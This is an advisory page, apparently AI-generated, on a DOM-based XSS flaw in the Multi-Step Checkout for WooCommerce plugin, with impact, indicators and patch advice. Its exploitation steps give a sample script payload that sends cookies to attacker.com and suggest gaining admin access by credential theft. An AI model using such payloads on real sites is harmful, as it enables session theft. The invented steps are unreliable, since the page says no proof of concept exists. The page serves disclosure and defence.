CVE-2025-67542
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67542 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the SilkyPress "Multi-Step Checkout for WooCommerce" WordPress plugin. It affects all versions up to and including 2.33, with version 2.34 being the patched release. The vulnerability was reported by researcher benzdeus on November 21, 2025, and published by Patchstack on December 15, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically manifesting as DOM-Based XSS. In DOM-Based XSS, malicious input is processed and reflected through the browser's Document Object Model without proper sanitization, allowing injected scripts to execute in the victim's browser context. Exploitation requires the attacker to have at least Administrator or Developer-level privileges on the WordPress site, and successful execution also requires a privileged user to interact with a crafted link or page (user interaction required). No public technical write-up or proof-of-concept code has been identified beyond the Patchstack advisory (Patchstack).

Impact

Successful exploitation allows an attacker to inject malicious scripts — such as redirects, advertisements, or arbitrary HTML/JavaScript payloads — into the affected WooCommerce checkout pages, which then execute in the browsers of visiting users. This can lead to session hijacking, credential theft, defacement, or delivery of malware to site visitors. The scope is changed (S:C), meaning the impact extends beyond the vulnerable component to affect end users' browsers, though confidentiality, integrity, and availability impacts are each rated Low (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-67542. The EPSS score is approximately 0.039% (0.000390), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that while XSS vulnerabilities of this class can be used in mass-exploit campaigns targeting WordPress sites, this specific issue is assessed as low priority and unlikely to be exploited (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "Multi-Step Checkout for WooCommerce" plugin (wp-multi-step-checkout) at version 2.33 or earlier, using tools like WPScan or Shodan.
  2. Privilege acquisition: Obtain Administrator or Developer-level access to the target WordPress site (e.g., via credential theft, brute force, or social engineering).
  3. Craft malicious payload: Construct a DOM-Based XSS payload targeting the vulnerable input field(s) within the plugin's checkout configuration or settings, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Inject the malicious script into the affected plugin parameter or page, or craft a URL/link that triggers the DOM manipulation when visited by a privileged user.
  5. Trigger execution: Induce a privileged user (e.g., site administrator or customer) to visit the crafted page or click the malicious link, causing the injected script to execute in their browser.
  6. Achieve objective: Harvest session cookies, redirect users to phishing pages, or perform unauthorized actions on behalf of the victim (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual requests to checkout-related pages (/checkout/, /wp-admin/) containing encoded JavaScript or HTML entities (e.g., %3Cscript%3E, javascript:, onerror=).
  • Network: Outbound connections from site visitors' browsers to unknown external domains shortly after visiting the WooCommerce checkout page; unexpected redirects originating from checkout page responses.
  • File System: Unexpected modifications to plugin files in /wp-content/plugins/wp-multi-step-checkout/ or injection of malicious code into plugin templates.
  • Process/Behavior: Unusual JavaScript execution in browser developer console on the checkout page; unexpected form submissions or cookie exfiltration attempts observed via browser network inspection.

Mitigation and workarounds

The vendor has released version 2.34 of the Multi-Step Checkout for WooCommerce plugin, which patches this vulnerability. Site administrators should update the plugin to version 2.34 or later immediately via the WordPress admin dashboard or by downloading the updated plugin from the WordPress plugin repository. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. No configuration-based workaround is documented; updating to the patched version is the only recommended remediation (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management